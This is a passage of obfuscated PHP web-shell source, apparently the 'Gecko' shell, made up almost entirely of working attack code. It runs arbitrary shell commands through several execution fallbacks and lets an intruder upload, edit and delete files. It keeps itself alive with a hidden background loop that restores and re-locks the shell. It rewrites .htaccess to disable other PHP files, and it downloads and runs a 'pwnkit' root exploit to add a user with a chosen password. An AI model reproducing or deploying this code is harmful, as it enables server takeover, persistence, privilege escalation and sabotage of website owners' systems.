- \$('#close-editor').click(function() {
- \$('.code-editor').hide();
- event.preventDefault();
- });
- \$('.close-terminal').click(function() {
- \$('.terminal').hide();
- event.preventDefault();
- });
- \$('.close-btn-s').click(function() {
- \$('.modal').hide();
- event.preventDefault();
- });
- });
- </script>
- </body>
- </html>
- ";
- if (isset($_GET["lockshell"])) {
- $utqmnnk = "curFile";
- $jknnjceqxq = "TmpNames";
- ${"GLOBALS"}["qmlakymll"] = "TmpNames";
- $isohmvpx = "curFile";
- $zvtyjjr = "hndlers";
- ${"GLOBALS"}["ytpsdrzovm"] = "TmpNames";
- $dbpnkmsfi = "fungsi";
- $bdoupnyyd = "TmpNames";
- ${"GLOBALS"}["utpijttxc"] = "curFile";
- ${"GLOBALS"}["pkbruqy"] = "TmpNames";
- ${"GLOBALS"}["jmvkaguf"] = "fungsi";
- ${"GLOBALS"}["xhlfiasj"] = "fungsi";
- $ynojlolnjc = "curFile";
- ${${"GLOBALS"}["vfuhqrqrce"]} = trim(basename($_SERVER["SCRIPT_FILENAME"]));
- ${${"GLOBALS"}["nfodbdej"]} = ${${"GLOBALS"}["snxjpduol"]}[31]();
- if (file_exists(${${"GLOBALS"}["pkbruqy"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${$utqmnnk}) . "-handler")) && file_exists(${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["xhlfiasj"]}[0]() . remove_dot(${$ynojlolnjc}) . "-text"))) {
- ${"GLOBALS"}["bmvgwnxbcio"] = "curFile";
- ${"GLOBALS"}["cmtlkbi"] = "curFile";
- ${"GLOBALS"}["awjjksll"] = "TmpNames";
- $btcufyjqga = "fungsi";
- cmd("rm -rf " . ${${"GLOBALS"}["awjjksll"]} . "/.sessions/." . base64_encode(${$btcufyjqga}[0]() . remove_dot(${${"GLOBALS"}["bmvgwnxbcio"]}) . "-text"));
- cmd("rm -rf " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["cmtlkbi"]}) . "-handler"));
- }
- $enznadbms = "curFile";
- ${"GLOBALS"}["adfvwfpqx"] = "handler";
- $jadnlsj = "curFile";
- mkdir(${${"GLOBALS"}["qmlakymll"]} . "/.sessions");
- cmd("cp $curFile " . ${$jknnjceqxq} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["vfuhqrqrce"]}) . "-text"));
- $ehhejlebpl = "fungsi";
- chmod(${${"GLOBALS"}["vfuhqrqrce"]}, 0444);
- $lkbiqkuwg = "fungsi";
- ${${"GLOBALS"}["adfvwfpqx"]} = "
- <?php
- @ini_set("max_execution_time\", 0);
- while (True){
- if (!file_exists("" . __DIR__ . "\")){
- mkdir("" . __DIR__ . "\");
- }
- if (!file_exists(\"" . ${$lkbiqkuwg}[0]() . "/" . ${${"GLOBALS"}["vfuhqrqrce"]} . "")){
- \$text = base64_encode(file_get_contents(\"" . ${${"GLOBALS"}["ytpsdrzovm"]} . "/.sessions/." . base64_encode(${$ehhejlebpl}[0]() . remove_dot(${$jadnlsj}) . "-text") . ""));
- file_put_contents(\"" . ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["vfuhqrqrce"]} . "", base64_decode(\$text));
- }
- if (gecko_perm(\"" . ${$dbpnkmsfi}[0]() . "/" . ${$enznadbms} . "\") != 0444){
- chmod(\"" . ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${$isohmvpx} . "", 0444);
- }
- }
- function gecko_perm(\$flename){
- return substr(sprintf("%o\", fileperms(\$flename)), -4);
- }
- ";
- $nbxxth = "hndlers";
- ${$zvtyjjr} = ${${"GLOBALS"}["jmvkaguf"]}[28](${$bdoupnyyd} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["utpijttxc"]}) . "-handler") . "", ${${"GLOBALS"}["vogxys"]});
- if (${$nbxxth}) {
- ${"GLOBALS"}["crgdxzpu"] = "fungsi";
- cmd("php " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["crgdxzpu"]}[0]() . remove_dot(${${"GLOBALS"}["vfuhqrqrce"]}) . "-handler") . " > /dev/null 2>/dev/null &");
- } else {
- failed();
- }
- }
- if (isset($_POST["gecko-up-submit"])) {
- $ovodrch = "fungsi";
- ${"GLOBALS"}["dblstedt"] = "tmpName";
- ${"GLOBALS"}["ykovngbq"] = "tmpName";
- ${${"GLOBALS"}["tskfcwedkdet"]} = $_FILES["gecko-upload"]["name"];
- ${${"GLOBALS"}["ykovngbq"]} = $_FILES["gecko-upload"]["tmp_name"];
- if (${$ovodrch}[29](${${"GLOBALS"}["dblstedt"]}, ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["tskfcwedkdet"]})) {
- success();
- } else {
- failed();
- }
- }
- if ($_GET["logout"] == True) {
- session_destroy();
- session_unset();
- success();
- }
- if (isset($_GET["destroy"])) {
- $xuucfxmk = "DOC_ROOT";
- ${$xuucfxmk} = $_SERVER["DOCUMENT_ROOT"];
- $sscohen = "CurrentFile";
- ${$sscohen} = trim(basename($_SERVER["SCRIPT_FILENAME"]));
- if (${${"GLOBALS"}["snxjpduol"]}[4](${${"GLOBALS"}["wiyrtp"]})) {
- ${"GLOBALS"}["wfwlsa"] = "DOC_ROOT";
- ${"GLOBALS"}["gxytrvgtc"] = "htaccess";
- ${${"GLOBALS"}["yyxroabywchy"]} = "
- <FilesMatch "\.(php|ph*|Ph*|PH*|pH*)\$">
- Deny from all
- </FilesMatch>
- <FilesMatch \"^(" . ${${"GLOBALS"}["xpixzuvernku"]} . "|index.php|wp-config.php|wp-includes.php)\$">
- Allow from all
- </FilesMatch>
- <FilesMatch \"\.(jpg|png|gif|pdf|jpeg)\$\">
- Allow from all
- </FilesMatch>";
- ${"GLOBALS"}["xbvdxflvcc"] = "put_htt";
- ${"GLOBALS"}["mgsqrjmx"] = "fungsi";
- $umjimuogf = "put_htt";
- ${${"GLOBALS"}["xbvdxflvcc"]} = ${${"GLOBALS"}["mgsqrjmx"]}[28](${${"GLOBALS"}["wfwlsa"]} . "/.htaccess", ${${"GLOBALS"}["gxytrvgtc"]});
- if (${$umjimuogf}) {
- success();
- } else {
- failed();
- }
- } else {
- failed();
- }
- }
- if (isset($_POST["save-editor"])) {
- ${"GLOBALS"}["qlquuf"] = "save";
- ${"GLOBALS"}["pcqiaeue"] = "save";
- ${"GLOBALS"}["helvhc"] = "fungsi";
- $blekadey = "fungsi";
- ${${"GLOBALS"}["pcqiaeue"]} = ${${"GLOBALS"}["helvhc"]}[28](${$blekadey}[0]() . "/" . unx($_GET["f"]), $_POST["code-editor"]);
- if (${${"GLOBALS"}["qlquuf"]}) {
- success();
- } else {
- failed();
- }
- }
- if (isset($_GET["adminer"])) {
- ${"GLOBALS"}["oichbkmzrll"] = "fungsi";
- ${"GLOBALS"}["jcvjybokqux"] = "URL";
- ${${"GLOBALS"}["jcvjybokqux"]} = "https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php";
- if (!${${"GLOBALS"}["oichbkmzrll"]}[3]("adminer.php")) {
- $cobwbfqqduim = "fungsi";
- $kvjkcnn = "URL";
- cmd("wget " . ${$kvjkcnn} . " -O adminer.php --quiet");
- echo "<meta http-equiv="refresh\" content="0;url=?d=" . hx(${$cobwbfqqduim}[0]()) . "\">";
- }
- }
- if ($_GET["terminal"] == "root") {
- ${"GLOBALS"}["rfwqmutpdy"] = "fungsi";
- if (!${${"GLOBALS"}["rfwqmutpdy"]}[3]("pwnkit")) {
- cmd("wget https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit -O pwnkit");
- ${"GLOBALS"}["tnjtxafjygt"] = "fungsi";
- cmd("chmod +x pwnkit");
- echo cmd("./pwnkit id > .mad-root");
- echo "<meta http-equiv="refresh\" content=\"0;url=?d=" . hx(${${"GLOBALS"}["tnjtxafjygt"]}[0]()) . "&terminal=root">";
- }
- }
- if (isset($_POST["submit-action"])) {
- $dvyggfaifhal = "items";
- ${$dvyggfaifhal} = $_POST["check"];
- if ($_POST["gecko-select"] == "delete") {
- foreach (${${"GLOBALS"}["wsmiqmj"]} as ${${"GLOBALS"}["hcoospnffxw"]}) {
- ${"GLOBALS"}["gybkrqfv"] = "fd";
- $hflksuh = "fd";
- $blcjto = "fd";
- $hrlurq = "fungsi";
- ${"GLOBALS"}["zujcwhq"] = "repl";
- ${${"GLOBALS"}["gsulzioh"]} = str_replace("\", "/", ${$hrlurq}[0]());
- ${${"GLOBALS"}["gybkrqfv"]} = ${${"GLOBALS"}["zujcwhq"]} . "/" . ${${"GLOBALS"}["hcoospnffxw"]};
- if (is_dir(${$blcjto}) || is_file(${$hflksuh})) {
- $gnetoshcg = "fd";
- ${"GLOBALS"}["yzhtwsn"] = "fd";
- $ivhfruxuecjx = "rmdir";
- ${${"GLOBALS"}["nfnomta"]} = unlinkDir(${$gnetoshcg});
- ${${"GLOBALS"}["gpqxlxle"]} = ${${"GLOBALS"}["snxjpduol"]}[24](${${"GLOBALS"}["yzhtwsn"]});
- if (${$ivhfruxuecjx} || ${${"GLOBALS"}["gpqxlxle"]}) {
- success();
- } else {
- failed();
- }
- }
- }
- }
- }
- if (isset($_POST["submit"])) {
- if ($_POST["create_folder"] == true) {
- $ypqokprwpmng = "fungsi";
- $gdpguhc = "NamaFolder";
- ${"GLOBALS"}["nctpkcloa"] = "NamaFolder";
- ${${"GLOBALS"}["nctpkcloa"]} = ${$ypqokprwpmng}[12]($_POST["create_folder"]);
- if (${$gdpguhc}) {
- success();
- } else {
- failed();
- }
- } else if ($_POST["create_file"] == true) {
- $uvybcnskmbw = "namaFile";
- ${"GLOBALS"}["blvdfqohru"] = "fungsi";
- ${"GLOBALS"}["qrdxikgzs"] = "namaFile";
- ${${"GLOBALS"}["qrdxikgzs"]} = ${${"GLOBALS"}["blvdfqohru"]}[13]($_POST["create_file"]);
- if (${$uvybcnskmbw}) {
- success();
- } else {
- failed();
- }
- } else if ($_POST["renameFile"] == true) {
- $ydnfxcqunmh = "renameFile";
- ${$ydnfxcqunmh} = ${${"GLOBALS"}["snxjpduol"]}[15](unx($_GET["re"]), $_POST["renameFile"]);
- if (${${"GLOBALS"}["qhxnggsf"]}) {
- success();
- } else {
- failed();
- }
- } else if ($_POST["chFile"]) {
- $wgnsecqi = "chFiles";
- ${${"GLOBALS"}["ooftqvks"]} = ${${"GLOBALS"}["snxjpduol"]}[30](unx($_GET["ch"]), $_POST["chFile"]);
- if (${$wgnsecqi}) {
- success();
- } else {
- failed();
- }
- } else if (isset($_POST["add-username"]) && isset($_POST["add-password"])) {
- ${"GLOBALS"}["hxwkojkq"] = "fungsi";
- if (!${${"GLOBALS"}["hxwkojkq"]}[3]("pwnkit")) {
- cmd("wget https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit -O pwnkit");
- cmd("chmod +x pwnkit");
- ${"GLOBALS"}["sqwlnasx"] = "fungsi";
- cmd("./pwnkit \"id\" > .mad-root");
- echo "<meta http-equiv="refresh" content=\"0;url=?d=" . hx(${${"GLOBALS"}["sqwlnasx"]}[0]()) . "&rooting=True">";
- } else if (${${"GLOBALS"}["snxjpduol"]}[3](".mad-root")) {
- $cbzwrut = "response";
- ${$cbzwrut} = ${${"GLOBALS"}["snxjpduol"]}[11](".mad-root");
- $eshdcuwg = "response";
- ${${"GLOBALS"}["ideydyre"]} = explode(" ", ${$eshdcuwg});
- if (${${"GLOBALS"}["ideydyre"]}[0] == "uid=0(root)") {
- $snjesqrgx = "username";
- ${${"GLOBALS"}["fqwhcuj"]} = $_POST["add-username"];
- ${"GLOBALS"}["wupnbhiku"] = "username";
- ${${"GLOBALS"}["ohmuswhkxx"]} = $_POST["add-password"];
- cmd("./pwnkit "useradd " . ${${"GLOBALS"}["wupnbhiku"]} . " ; echo -e "" . ${${"GLOBALS"}["ohmuswhkxx"]} . "
- " . ${${"GLOBALS"}["ohmuswhkxx"]} . "\" | passwd " . ${$snjesqrgx} . "\"");
- } else {
- echo "<meta http-equiv=\"refresh\" content="0;url=?d=" . hx(${${"GLOBALS"}["snxjpduol"]}[0]()) . "&adduser=failed">";
- }
- }
- } else if ($_POST["lockfile"] == true) {
- ${"GLOBALS"}["hgdortc"] = "hndlers";
- $cxichofrfpho = "hndlers";
- ${"GLOBALS"}["wupvrlsyhjk"] = "handler";
- $jjwvypro = "flesName";
- $moysjvktwc = "fungsi";
- ${"GLOBALS"}["tneuvl"] = "fungsi";
- $gnyihl = "flesName";
- ${"GLOBALS"}["dljidwsezi"] = "TmpNames";
- $gekesqmsi = "flesName";
- $wzsgwh = "flesName";
- $rsebcsqvk = "fungsi";
- ${"GLOBALS"}["cduzexfwcry"] = "TmpNames";
- $yyhjqlb = "fungsi";
- $yvfdddxa = "fungsi";
- ${$jjwvypro} = $_POST["lockfile"];
- ${${"GLOBALS"}["dljidwsezi"]} = ${${"GLOBALS"}["snxjpduol"]}[31]();
- $rzhnqvtsnc = "flesName";
- if (file_exists(${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${$rsebcsqvk}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-handler")) && file_exists(${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . remove_dot(${$wzsgwh}) . "-text")) {
- $rlgzkhpyjs = "fungsi";
- ${"GLOBALS"}["diqyijl"] = "TmpNames";
- $vdjkeffd = "fungsi";
- cmd("rm -rf " . ${${"GLOBALS"}["diqyijl"]} . "/.sessions/." . base64_encode(${$vdjkeffd}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-text-file"));
- cmd("rm -rf " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${$rlgzkhpyjs}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-handler"));
- }
- mkdir(${${"GLOBALS"}["nfodbdej"]} . "/.sessions");
- ${"GLOBALS"}["vbpycrxw"] = "flesName";
- ${"GLOBALS"}["vqwwmxfkebq"] = "fungsi";
- cmd("cp $flesName " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${$rzhnqvtsnc}) . "-text-file"));
- chmod(${$gnyihl}, 0444);
- ${${"GLOBALS"}["wupvrlsyhjk"]} = "
- <?php
- @ini_set("max_execution_time", 0);
- while (True){
- if (!file_exists("" . ${$yvfdddxa}[0]() . "")){
- mkdir(\"" . ${${"GLOBALS"}["snxjpduol"]}[0]() . "");
- }
- if (!file_exists("" . ${${"GLOBALS"}["tneuvl"]}[0]() . "/" . ${${"GLOBALS"}["vhimbugtql"]} . "\")){
- \$text = base64_encode(file_get_contents(\"" . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-text-file") . "\"));
- file_put_contents(\"" . ${$moysjvktwc}[0]() . "/" . ${$gekesqmsi} . "\", base64_decode(\$text));
- }
- if (gecko_perm(\"" . ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["vhimbugtql"]} . "") != 0444){
- chmod(\"" . ${${"GLOBALS"}["vqwwmxfkebq"]}[0]() . "/" . ${${"GLOBALS"}["vbpycrxw"]} . "\", 0444);
- }
- }
- function gecko_perm(\$flename){
- return substr(sprintf(\"%o", fileperms(\$flename)), -4);
- }
- ";
- ${${"GLOBALS"}["hgdortc"]} = ${$yyhjqlb}[28](${${"GLOBALS"}["cduzexfwcry"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-handler") . "", ${${"GLOBALS"}["vogxys"]});
- if (${$cxichofrfpho}) {
- cmd("php " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-handler") . " > /dev/null 2>/dev/null &");
- } else {
- failed();
- }
- }
- }
- function success()
- {
- echo "<meta http-equiv=\"refresh\" content=\"0;url=?d=" . hx($GLOBALS["fungsi"][0]()) . "&response=success\">";
- }
- function failed()
- {
- echo "<meta http-equiv="refresh\" content=\"0;url=?d=" . hx($GLOBALS["fungsi"][0]()) . "&response=failed">";
- }
- function formatSize($bytes)
- {
- $irgjoi = "types";
- ${"GLOBALS"}["dipopqio"] = "bytes";
- ${$irgjoi} = array("<span class="file-size">B</span>", "<span class=\"file-size\">KB</span>", "<span class="file-size">MB</span>", "<span class=\"file-size">GB</span>", "<span class="file-size">TB</span>");
- for (${${"GLOBALS"}["syglgogire"]} = 0; ${${"GLOBALS"}["vrqmqvvo"]} >= 1024 && ${${"GLOBALS"}["syglgogire"]} < (count(${${"GLOBALS"}["tljbiml"]}) - 1); ${${"GLOBALS"}["dipopqio"]} /= 1024, ${${"GLOBALS"}["syglgogire"]}++);
- return (round(${${"GLOBALS"}["vrqmqvvo"]}, 2) . " " . ${${"GLOBALS"}["tljbiml"]}[${${"GLOBALS"}["syglgogire"]}]);
- }
- function hx($n)
- {
- $letvlrhlzxe = "i";
- $acfpucvhvd = "i";
- ${${"GLOBALS"}["xcntuxiflw"]} = "";
- for (${$letvlrhlzxe} = 0; ${$acfpucvhvd} < strlen(${${"GLOBALS"}["qhksqaif"]}); ${${"GLOBALS"}["syglgogire"]}++) {
- ${${"GLOBALS"}["xcntuxiflw"]} .= dechex(ord(${${"GLOBALS"}["qhksqaif"]}[${${"GLOBALS"}["syglgogire"]}]));
- }
- return ${${"GLOBALS"}["xcntuxiflw"]};
- }
- function unx($y)
- {
- ${"GLOBALS"}["evbpwnu"] = "y";
- ${${"GLOBALS"}["qhksqaif"]} = "";
- ${"GLOBALS"}["lneggsfybz"] = "i";
- for (${${"GLOBALS"}["lneggsfybz"]} = 0; ${${"GLOBALS"}["syglgogire"]} < strlen(${${"GLOBALS"}["evbpwnu"]}) - 1; ${${"GLOBALS"}["syglgogire"]} += 2) {
- $dsskas = "i";
- $fznghhqgmy = "y";
- $wsgjklsdlmh = "y";
- ${${"GLOBALS"}["qhksqaif"]} .= chr(hexdec(${$wsgjklsdlmh}[${$dsskas}] . ${$fznghhqgmy}[${${"GLOBALS"}["syglgogire"]} + 1]));
- }
- return ${${"GLOBALS"}["qhksqaif"]};
- }
- function suggest_exploit()
- {
- ${"GLOBALS"}["dgzbftzjuwo"] = "uname";
- $scgjesnbs = "uname";
- ${"GLOBALS"}["qfjupzstsx"] = "xpld";
- $qethrlp = "pl";
- ${${"GLOBALS"}["dgzbftzjuwo"]} = $GLOBALS["fungsi"][8]();
- ${"GLOBALS"}["kdimvnzsdr"] = "pl";
- ${${"GLOBALS"}["xvbovn"]} = explode(" ", ${$scgjesnbs});
- ${${"GLOBALS"}["ivoqwpbeyh"]} = explode("-", ${${"GLOBALS"}["xvbovn"]}[2]);
- ${$qethrlp} = explode(".", ${${"GLOBALS"}["qfjupzstsx"]}[0]);
- return ${${"GLOBALS"}["yxxjlgbcy"]}[0] . "." . ${${"GLOBALS"}["yxxjlgbcy"]}[1] . "." . ${${"GLOBALS"}["kdimvnzsdr"]}[2];
- }
- function s()
- {
- $vdgikwqorbx = "d0mains";
- ${$vdgikwqorbx} = @$GLOBALS["fungsi"][7]("/etc/named.conf", false);
- if (!${${"GLOBALS"}["myqqvzxfwnl"]}) {
- $xrxbnliohoq = "dom";
- ${$xrxbnliohoq} = "<font color=red size=2px>Cant Read [ /etc/named.conf ]</font>";
- $GLOBALS["need_to_update_header"] = "true";
- } else {
- ${"GLOBALS"}["mrvtghyqwu"] = "dom";
- ${"GLOBALS"}["qpclqku"] = "d0mains";
- ${${"GLOBALS"}["exkwiu"]} = 0;
- foreach (${${"GLOBALS"}["qpclqku"]} as ${${"GLOBALS"}["jbxzmvsqntn"]}) {
- ${"GLOBALS"}["chxwvcxjp"] = "d0main";
- if (@strstr(${${"GLOBALS"}["chxwvcxjp"]}, "zone")) {
- ${"GLOBALS"}["mwehtriwwmy"] = "domains";
- $rvjwavibhni = "domains";
- preg_match_all("#zone "(.*)\"#", ${${"GLOBALS"}["jbxzmvsqntn"]}, ${$rvjwavibhni});
- flush();
- if (strlen(trim(${${"GLOBALS"}["mwehtriwwmy"]}[1][0])) > 2) {
- flush();
- ${${"GLOBALS"}["exkwiu"]}++;
- }
- }
- }
- ${${"GLOBALS"}["mrvtghyqwu"]} = "$count Domain";
- }
- return ${${"GLOBALS"}["tcirhful"]};
- }
- function cmd($in, $re = false)
- {
- ${${"GLOBALS"}["ftlwdhcjjlb"]} = "";
- try {
- $hvwbptfprwq = "in";
- if (${${"GLOBALS"}["ylnznsnqbkvh"]}) ${${"GLOBALS"}["oplcdvp"]} = ${$hvwbptfprwq} . " 2>&1";
- if (function_exists("exec")) {
- @$GLOBALS["fungsi"][16](${${"GLOBALS"}["oplcdvp"]}, ${${"GLOBALS"}["ftlwdhcjjlb"]});
- ${"GLOBALS"}["dcgyuqbn"] = "out";
- ${${"GLOBALS"}["dcgyuqbn"]} = @join("
- ", ${${"GLOBALS"}["ftlwdhcjjlb"]});
- } elseif (function_exists("passthru")) {
- $zbxdghsew = "out";
- ob_start();
- @$GLOBALS["fungsi"][17](${${"GLOBALS"}["oplcdvp"]});
- ${$zbxdghsew} = ob_get_clean();
- } elseif (function_exists("system")) {
- $npbiyvsnodo = "in";
- ob_start();
- @$GLOBALS["fungsi"][18](${$npbiyvsnodo});
- ${${"GLOBALS"}["ftlwdhcjjlb"]} = ob_get_clean();
- } elseif (function_exists("shell_exec")) {
- $djxmmjga = "in";
- ${${"GLOBALS"}["ftlwdhcjjlb"]} = $GLOBALS["fungsi"][19](${$djxmmjga});
- } elseif (function_exists("popen") && function_exists("pclose")) {
- ${"GLOBALS"}["cnfoyrl"] = "in";
- if (is_resource(${${"GLOBALS"}["rwpikbcwrgi"]} = @$GLOBALS["fungsi"][20](${${"GLOBALS"}["cnfoyrl"]}, "r"))) {
- ${"GLOBALS"}["qkzcmqqkfk"] = "f";
- ${"GLOBALS"}["ituqznedgim"] = "f";
- ${${"GLOBALS"}["ftlwdhcjjlb"]} = "";
- ${"GLOBALS"}["gflvxsrnfo"] = "out";
- while (!@feof(${${"GLOBALS"}["rwpikbcwrgi"]})) ${${"GLOBALS"}["gflvxsrnfo"]} .= fread(${${"GLOBALS"}["ituqznedgim"]}, 1024);
- $GLOBALS["fungsi"][21](${${"GLOBALS"}["qkzcmqqkfk"]});
- }
- } elseif (function_exists("proc_open")) {
- $ujcfwptmp = "in";
- ${"GLOBALS"}["xakxtubpwf"] = "pipes";
- ${"GLOBALS"}["hopxspef"] = "process";
- $ubbytmnb = "out";
- ${${"GLOBALS"}["xakxtubpwf"]} = array();
- ${${"GLOBALS"}["hopxspef"]} = @$GLOBALS["fungsi"][23](${$ujcfwptmp} . " 2>&1", array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), ${${"GLOBALS"}["yqdkwiyd"]}, null);
- ${$ubbytmnb} = @$GLOBALS["fungsi"][22](${${"GLOBALS"}["yqdkwiyd"]}[1]);
- } elseif (class_exists("COM")) {
- $gplhjlxmqncr = "alfaWs";
- ${"GLOBALS"}["twqksukbvd"] = "stdout";
- ${$gplhjlxmqncr} = new COM("WScript.shell");
- ${${"GLOBALS"}["exvqbodeqcc"]} = $alfaWs->$GLOBALS["fungsi"][16]("cmd.exe /c " . $_POST["alfa1"]);
- ${${"GLOBALS"}["twqksukbvd"]} = $exec->StdOut();
- ${${"GLOBALS"}["ftlwdhcjjlb"]} = $stdout->ReadAll();
- }
- } catch (Exception $e) {
- }
- return $out;
- }
- function unlinkDir($dir)
- {
- $mxcxuhqbgj = "i";
- ${${"GLOBALS"}["hoapkwhmi"]} = array(${${"GLOBALS"}["njgztpho"]});
- ${${"GLOBALS"}["sotsubd"]} = array();
- $noonhxdh = "dir";
- ${"GLOBALS"}["wbptvix"] = "dirs";
- for (${${"GLOBALS"}["syglgogire"]} = 0;; ${$mxcxuhqbgj}++) {
- ${"GLOBALS"}["pdcflzb"] = "dirs";
- if (isset(${${"GLOBALS"}["hoapkwhmi"]}[${${"GLOBALS"}["syglgogire"]}])) ${${"GLOBALS"}["njgztpho"]} = ${${"GLOBALS"}["pdcflzb"]}[${${"GLOBALS"}["syglgogire"]}];
- else break;
- if (${${"GLOBALS"}["lbdylir"]} = opendir(${${"GLOBALS"}["njgztpho"]})) {
- $mfttjdr = "readDir";
- $mfdlwx = "openDir";
- while (${$mfttjdr} = @readdir(${$mfdlwx})) {
- if (${${"GLOBALS"}["nlqvcexcsqf"]} != "." && ${${"GLOBALS"}["nlqvcexcsqf"]} != "..") {
- $tnlkxbt = "dir";
- if ($GLOBALS["fungsi"][2](${$tnlkxbt} . "/" . ${${"GLOBALS"}["nlqvcexcsqf"]})) {
- ${"GLOBALS"}["nnorxlnz"] = "dir";
- ${"GLOBALS"}["hqwryip"] = "readDir";
- ${${"GLOBALS"}["hoapkwhmi"]}[] = ${${"GLOBALS"}["nnorxlnz"]} . "/" . ${${"GLOBALS"}["hqwryip"]};
- } else {
- $okajffecrpe = "files";
- ${"GLOBALS"}["syxnqhpm"] = "dir";
- ${$okajffecrpe}[] = ${${"GLOBALS"}["syxnqhpm"]} . "/" . ${${"GLOBALS"}["nlqvcexcsqf"]};
- }
- }
- }
- }
- }
- foreach (${${"GLOBALS"}["sotsubd"]} as ${${"GLOBALS"}["eujpqmf"]}) {
- $GLOBALS["fungsi"][24](${${"GLOBALS"}["eujpqmf"]});
- }
- ${${"GLOBALS"}["hoapkwhmi"]} = array_reverse(${${"GLOBALS"}["wbptvix"]});
- foreach (${${"GLOBALS"}["hoapkwhmi"]} as ${$noonhxdh}) {
- $cxcsfelbfhu = "dir";
- $GLOBALS["fungsi"][25](${$cxcsfelbfhu});
- }
- }
- function remove_dot($file)
- {
- ${"GLOBALS"}["jpfaiodwqo"] = "FILES";
- $dogkxkzkb = "FILES";
- ${$dogkxkzkb} = ${${"GLOBALS"}["eujpqmf"]};
- $pudflfwtqsq = "pch";
- $jwcffcesuian = "pch";
- ${$pudflfwtqsq} = explode(".", ${${"GLOBALS"}["jpfaiodwqo"]});
- return ${$jwcffcesuian}[0];
- }
- function perms($file)
- {
- ${"GLOBALS"}["muhifdbszpx"] = "perms";
- $budbfbkwgim = "info";
- ${"GLOBALS"}["niqosh"] = "perms";
- $vkfyefzxen = "perms";
- $mshayo = "file";
- $qyigwvd = "perms";
- ${${"GLOBALS"}["snucwrjx"]} = $GLOBALS["fungsi"][6](${$mshayo});
- $yweukowba = "perms";
- ${"GLOBALS"}["etuurjljd"] = "perms";
- ${"GLOBALS"}["fpruwhymp"] = "perms";
- ${"GLOBALS"}["hoqhssjete"] = "perms";
- $vbbwezosh = "perms";
- $ydjzbkyoavu = "perms";
- ${"GLOBALS"}["wxwxtxk"] = "info";
- $bopusfto = "info";
- ${"GLOBALS"}["kireyz"] = "info";
- ${"GLOBALS"}["ahvxprf"] = "perms";
- ${"GLOBALS"}["dmvfhxchs"] = "info";
- if ((${${"GLOBALS"}["snucwrjx"]} & 0xC000) == 0xC000) {
- ${${"GLOBALS"}["wrrdfeiqpw"]} = "s";
- } elseif ((${$yweukowba} & 0xA000) == 0xA000) {
- ${${"GLOBALS"}["wrrdfeiqpw"]} = "l";
- } elseif ((${$qyigwvd} & 0x8000) == 0x8000) {
- ${"GLOBALS"}["ozvqvtmzoa"] = "info";
- ${${"GLOBALS"}["ozvqvtmzoa"]} = "-";
- } elseif ((${$vkfyefzxen} & 0x6000) == 0x6000) {
- ${${"GLOBALS"}["wrrdfeiqpw"]} = "b";
- } elseif ((${$vbbwezosh} & 0x4000) == 0x4000) {
- ${"GLOBALS"}["urcivwumrnb"] = "info";
- ${${"GLOBALS"}["urcivwumrnb"]} = "d";
- } elseif ((${${"GLOBALS"}["snucwrjx"]} & 0x2000) == 0x2000) {
- ${${"GLOBALS"}["wrrdfeiqpw"]} = "c";
- } elseif ((${${"GLOBALS"}["hoqhssjete"]} & 0x1000) == 0x1000) {
- $ygtvtpoq = "info";
- ${$ygtvtpoq} = "p";
- } else {
- ${${"GLOBALS"}["wrrdfeiqpw"]} = "u";
- }
- ${${"GLOBALS"}["wxwxtxk"]} .= ((${${"GLOBALS"}["snucwrjx"]} & 0x0100) ? "r" : "-");
- ${"GLOBALS"}["nmbuvcrctn"] = "info";
- ${$bopusfto} .= ((${${"GLOBALS"}["snucwrjx"]} & 0x0080) ? "w" : "-");
- ${${"GLOBALS"}["nmbuvcrctn"]} .= ((${${"GLOBALS"}["snucwrjx"]} & 0x0040) ? ((${${"GLOBALS"}["snucwrjx"]} & 0x0800) ? "s" : "x") : ((${${"GLOBALS"}["etuurjljd"]} & 0x0800) ? "S" : "-"));
- $gzdcjjppeft = "perms";
- ${${"GLOBALS"}["wrrdfeiqpw"]} .= ((${${"GLOBALS"}["fpruwhymp"]} & 0x0020) ? "r" : "-");
- $vczgyuadbh = "perms";
- ${${"GLOBALS"}["kireyz"]} .= ((${${"GLOBALS"}["muhifdbszpx"]} & 0x0010) ? "w" : "-");
- ${${"GLOBALS"}["wrrdfeiqpw"]} .= ((${$gzdcjjppeft} & 0x0008) ? ((${${"GLOBALS"}["ahvxprf"]} & 0x0400) ? "s" : "x") : ((${$vczgyuadbh} & 0x0400) ? "S" : "-"));
